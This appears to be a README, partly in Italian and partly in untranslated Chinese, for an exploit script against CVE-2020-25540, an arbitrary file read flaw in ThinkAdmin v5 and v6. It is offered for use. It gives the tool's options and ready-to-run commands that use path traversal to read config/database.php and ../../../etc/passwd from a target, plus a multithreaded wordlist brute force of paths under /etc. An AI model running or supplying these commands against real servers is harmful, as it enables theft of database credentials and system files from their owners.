
Sfruttamento della vulnerabilità di lettura arbitraria dei file in ThinkAdmin v5 v6, con brute force tramite dizionario personalizzabile.
Questo script viene utilizzato per lo sfruttamento della vulnerabilità di lettura arbitraria dei file nelle versioni v5 e v6 di ThinkAdmin
==L'endpoint API può variare tra le diverse versioni (alcune basate su sviluppi secondari dell'ThinkAdmin originale)==
Uso di base
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
[-p PARALLEL]
通过 API 读取文件并获取响应
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标 IP 地址或域名
-f FILE, --file FILE 要读取的文件路径
-w WORDLIST, --wordlist WORDLIST
字典文件路径,提供多个文件路径或文件名
-b BASE_PATH, --base-path BASE_PATH
基础路径,用于拼接字典文件中的路径
-p PARALLEL, --parallel PARALLEL
并行线程数
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10